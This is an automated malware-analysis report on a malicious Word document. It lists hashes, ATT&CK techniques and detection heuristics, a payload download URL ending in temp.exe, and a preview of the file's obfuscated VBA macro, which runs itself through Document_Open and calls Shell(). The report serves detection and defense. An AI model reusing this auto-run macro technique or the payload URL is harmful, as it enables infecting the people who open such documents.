Office (OOXML) malware analysis — malicious · ca4240356fa75fc8

MALICIOUS

Office (OOXML)

227.5 KB Created: 2018-12-19 15:51:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2019-02-04

MD5: 47be4c7201d898e99f4794d379aebc54 SHA-1: 47a537b2c7a1651d8d7cdc81204510f007b3ceb6 SHA-256: ca4240356fa75fc82fdf4bd53d762373ce425e074bb1c240ebab2b6a69b29004

162 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is an OOXML document containing a VBA macro. The 'Document_Open' macro is configured to execute a command using the Shell() function. This is a common technique for downloading and executing additional malicious payloads. The obfuscated nature of the script prevents a more detailed analysis of its specific actions or any embedded URLs.

Heuristics 5

VBA project inside OOXML medium 3 related findings OOXML_VBA

Document contains a VBA project — VBA macros present
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL https://melabatement.ga/workpay/fresh/new/temp.exe In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingCanvasIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
- http://ns.adobe.com/xap/1.0/In document text (OOXML body / shared strings)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OOXML body / shared strings)
- http://ns.adobe.com/xap/1.0/mm/In document text (OOXML body / shared strings)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OOXML body / shared strings)
- http://ns.adobe.com/photoshop/1.0/In document text (OOXML body / shared strings)
- http://purl.org/dc/elements/1.1/In document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	31547 bytes
SHA-256: `a266cb510899852c4798b852a10abdeaed2ff81c8f9e3776612e8de74fbd12f5`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Private Sub Document_Open() Call girhrxloq End Sub Private Sub girhrxloq() Dim lro Dim wqmpla Dim jbuzrwgv Dim wzzsyzgomgi Dim dutvspcqgjf As Date Dim bidvisma Dim fgeulnptgsoxpc Dim sagv dutvspcqgjf = 86 Do While 509 < 2 Select Case fcjzxlpnnzf Case "?¹áê?¼ìÆÒ¨�î¬", "§Æíø?", "�¾ñô¡¼" fhcasfdpcjlxb = "£Æòë?²ó½Ë¡?ð¦¦" Case "¦²ïö�ÂöÈÝ±�", "¬Èëê�Ç" suffix = "¤·ôñ?ÅáÀÛª?ç?¦Í" Case "¢´âé¥°", "¡ÄÜã?ÅçÎÞ" fhcasfdpcjlxb = "¡¶æí�Èí»Ñ??Ú¡?" Case Else zjawisl = "lhztjnhxpbme" End Select Dim yqffqvs Dim pbcc Dim pbdmxdqbwcfgtfk Exit Do Randomize Loop Dim wwnxycnnayo As Date Dim xebvguvpxe Dim cvsenqngxrjnmf Dim wtb wwnxycnnayo = 28 Do While 918 < 2 Select Case jlmqk Case "ªÉïî?ÃæÈÕ¤?ò?¤Ñ×", "?Åàõ£Ç", "?Äå÷?Áà" grtbxvmwhoxfl = "¨·äê?½ö" Case "?Êãè?»ö", "ª¼ëâ?ÆçÉ" suffix = "¬Êéê?²õ" Case "¦³ô", "¢½ëç?Æï" grtbxvmwhoxfl = "?·ç÷?" Case Else kjnweedinvpadd = "awknguocyvsynal" End Select Dim uqpsfluzic Dim gwrlibxtxbc Dim ymy Exit Do Randomize Loop Dim vhh As Date Dim klhrczp Dim frmelszjelzqhqd Dim kddfoplggfsvrb vhh = 69 Do While 718 < 8 Select Case bcecinfykf Case "¢·êò?¸", "?Çßä�¿è¾Ó§?ï©©", "¡½åè?" eqadvzcbmfqoopv = "§²êô�" Case "?µî÷?²ïÇÈ¦?ã??Ñ", "¡¸êî?Äè»Ó" suffix = "£ºçï�½âµØ£�ñ¨¡" Case "?ÊÛí", "§´åð¡µ" eqadvzcbmfqoopv = "¢Áè" Case Else tudc = "auohdjaovqwpejk" End Select Dim nyyuzxjp Dim owboearfkcnnc Dim qkmvv Exit Do Randomize Loop Dim gjuwxmsxokbl As Date Dim csaxllpyfeok Dim uwwmtkixkka Dim rohtckew gjuwxmsxokbl = 24 Do While 566 < 8 Select Case jbznqtsm Case "?Ääà?³÷", "«Æíà?¿åÆ", "¨´ì" yaxyabh = "ÂÛç?¿õÂÏ" Case "¤¶Û÷£¿à¶Ê??é??Ãà", "«½âî ¶çÉÚ" suffix = "ª²åâ?ÀêÍ×±" Case "?³ëö?°ö¸È¯?á©", " ³àç?»åÁÍ" yaxyabh = "¦ÁÞõ?³èÎÔ?á?" Case Else vrgcytcwmvkf = "rnahqpojejdcyr" End Select Dim iynjjfparradzzfv Dim zsaieuwevelzensm Dim aputiuwavjqcn Exit Do Randomize Loop If 9 = 8 Then Dim xoaihqjkb Else Dim vyferrkbby Application.Run "tRvuhmO.rQshhoG" End If Dim wihv Dim hokgfi End Sub Attribute VB_Name = "tRvuhmO" Const iugjrrbrcyjdfii = 418 Const fre = 8 Const anewfptxuqh = 75 #If VBA7 Then #Else #End If #If VBA7 Then Private Declare PtrSafe Function ngnwepbyrzo Lib "user32" Alias "GetPropA" (ByVal hwnd As Long, ByVal lpString As String) As Long Private Declare PtrSafe Function nksnlyry Lib "user32" Alias "SetPropA" (ByVal hwnd As Long, ByVal lpString As String, ByVal hData As Long) As Long Private Declare PtrSafe Function xldkxogdkfd Lib "user32" Alias "RemovePropA" (ByVal hwnd As Long, ByVal lpString As String) As Long Private Declare PtrSafe Function gqrs Lib "user32" Alias "EnumPropsA" (ByVal hwnd As Long, ByVal lpEnumFunc As Long) As Long Private Declare PtrSafe Function hmxjeauixufx Lib "kernel32" Alias "lstrlenA" (ByVal lpString As String) As Long Private Declare PtrSafe Function pxkbfeklwdlkj Lib "kernel32" Alias "lstrcpyA" (ByVal lpString1 As String, ByVal lpString2 As Long) As Long #Else Private Declare Function ngnwepbyrzo Lib "user32" Alias "GetPropA" (ByVal hwnd As Long, ByVal lpString As String) As Long Private Declare Function nksnlyry Lib "user32" Alias "SetPropA" (ByVal hwnd As Long, ByVal lpString As String, ByVal hData As ... (truncated)
`vbaProject_00.bin`	vba-project	OOXML VBA project: word/vbaProject.bin	71680 bytes
SHA-256: `ead3aad0bfe1869b497f16c79222e19f8dfb9f958f20c86be30274cb9dbe9c9d`

Open this report in the interactive analyzer, or submit your own file for analysis.